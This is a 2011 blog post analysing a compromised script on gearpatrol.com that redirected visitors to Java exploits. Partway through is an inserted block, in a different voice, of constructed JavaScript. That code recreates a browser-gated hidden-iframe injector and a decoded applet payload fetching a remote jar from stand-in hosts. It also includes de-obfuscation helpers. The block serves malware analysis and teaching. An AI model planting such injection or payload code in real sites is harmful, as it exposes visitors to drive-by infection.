Sunday, July 17, 2011

Gear Patrol site redirecting to malware

Gearpatrol.com, the "definitive men's resource site", had an owned (compromised) JavaScript file linked from its main page that was redirecting visitors to Java exploits and malware the other day. I'll show you.

The owned JS File

If you had gone to Gearpatrol.com the other day, the main page linked to a JS file that loads without you ever noticing it.


"The definitive men's resource"  - haha


Gearpatrol.com loads up when all of a sudden shit starts going wrong. Then you think, "What in the hell...?"


A suspicious jquery.js file is sourced from the main page and set to load automatically.



Here is what the request/response looks like. You can see the code served by gearpatrol.com is awkward looking, but it doesn't look definitively malicious at first sight.


jQuery JavaScript files always look rather fucked to me, but this one in particular looked especially strange, so I decided to work out what it was doing. The script reads two JS properties that Malzilla can't handle, so I statically assigned them: navigator.platform (the operating system) and navigator.userAgent (the web browser). After these two changes the script simply ran and told me exactly what it was doing, thankfully.


In the bottom pane you can see the iframe the JavaScript file was injecting into Gearpatrol.com's main page. Let's see where that iframe takes us.


Ahh, that first redirect was most likely for statistics purposes. We then get bounced off to a risque site, teenporntubeonly.com. But we won't find porn there. Instead we find obfuscated JavaScript using typical techniques: it multiplies each number in an array by the variable 'g', then calls String.fromCharCode on each product. The lower pane shows the results after de-obfuscating the code.
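To make the two analysis steps above concrete (pinning navigator.platform and navigator.userAgent so a gated loader will run outside a browser, and undoing the multiply-then-String.fromCharCode encoding), here is an added example. It is not code from the original post and not the injected script itself: the loader source, the hostnames (example.invalid), the multiplier g and the decoded payload are all constructed for illustration.

```javascript
// Added example, not code from the original post and not the injected script
// itself. It models the two steps the post describes: pinning navigator
// properties so an environment-gated loader can be evaluated outside a browser
// (what the author did by hand in Malzilla), and decoding the
// multiply-by-g / String.fromCharCode scheme seen on the second-stage page.
// All hostnames, the loader source, the multiplier g and the decoded payload
// are constructed for illustration; none are the incident's real values.

// Constructed stand-in for the gated stage-one loader: only a Windows / MSIE
// visitor gets the hidden iframe, so a plain static read of the file, or a
// sandbox with the wrong navigator values, shows nothing at all.
const STAGE_ONE_SOURCE = `
  if (navigator.platform.indexOf('Win') === 0 &&
      navigator.userAgent.indexOf('MSIE') !== -1) {
    document.write('<iframe src="http://stats.example.invalid/in.php"' +
                   ' width="1" height="1" style="visibility:hidden"></iframe>');
  }
`;

// Evaluate a loader with navigator replaced by a stub and document.write
// captured, so the markup it would inject is returned instead of loaded.
// Only do this with a script you have already read: the body runs as real JS,
// so anything that reaches for the network belongs in a VM, not here.
function runWithStubs(scriptSource, navStub) {
  const written = [];
  const documentStub = { write: (s) => written.push(String(s)) };
  const loader = new Function('navigator', 'document', scriptSource);
  loader(navStub, documentStub);
  return written.join('');
}

// Pull iframe src values out of whatever the loader wrote.
function iframeTargets(html) {
  const out = [];
  const re = /<iframe[^>]*\bsrc=["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Stage two as described in the post: each array element times g is a char
// code. Decoding is just undoing that; no eval is needed once you know g.
function decodeMulFromCharCode(encoded, g) {
  return encoded.map((n) => String.fromCharCode(n * g)).join('');
}

// Encoder used only to build the constructed sample. With g a power of two,
// code / g is exact in IEEE doubles, so n * g round-trips without drift.
function encodeForDemo(text, g) {
  return Array.from(text, (ch) => ch.charCodeAt(0) / g);
}

const G = 4;
const STAGE_TWO_PAYLOAD =
  '<applet code="Loader.class" archive="http://exploit.example.invalid/j.jar">' +
  '</applet>';
const STAGE_TWO_ENCODED = encodeForDemo(STAGE_TWO_PAYLOAD, G);

function demo() {
  // Two constructed visitor profiles: the one the loader wants, and one it ignores.
  const winNav = {
    platform: 'Win32',
    userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
  };
  const linuxNav = {
    platform: 'Linux x86_64',
    userAgent: 'Mozilla/5.0 (X11; Linux x86_64) Firefox/5.0',
  };
  const injected = runWithStubs(STAGE_ONE_SOURCE, winNav);
  const silent = runWithStubs(STAGE_ONE_SOURCE, linuxNav);
  const decoded = decodeMulFromCharCode(STAGE_TWO_ENCODED, G);
  return { injected, silent, targets: iframeTargets(injected), decoded };
}

const result = demo();
console.log('Win/MSIE visitor gets:', result.targets);
console.log('Linux/Firefox visitor gets:', JSON.stringify(result.silent));
console.log('Stage two decodes to:', result.decoded);
```

The point of the stub is the same one the post makes about Malzilla: a loader that branches on navigator values will look inert unless you feed it the values it is looking for, so try the platform/user-agent pair the campaign is targeting, not the one your analysis box reports.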


And once it's formatted you can tell it's serving various Java exploits, which no doubt drop various malware. These were your typical Java exploits, nothing special, but it goes to show how you can get snagged from nearly any site these days, ESPECIALLY if you have outdated Java, Adobe anything, or an outdated web browser.



There's nothing amazing going on here. This happens to a lot of sites, and some are faster than others at removing it (this one appears to be fixed on Gearpatrol.com). Really the main thing you can do to prevent any issues is keep your software updated and hope the malware people don't use 0-days or very new exploits. If you run a site, the lesson from this one is to watch for script includes you didn't add.
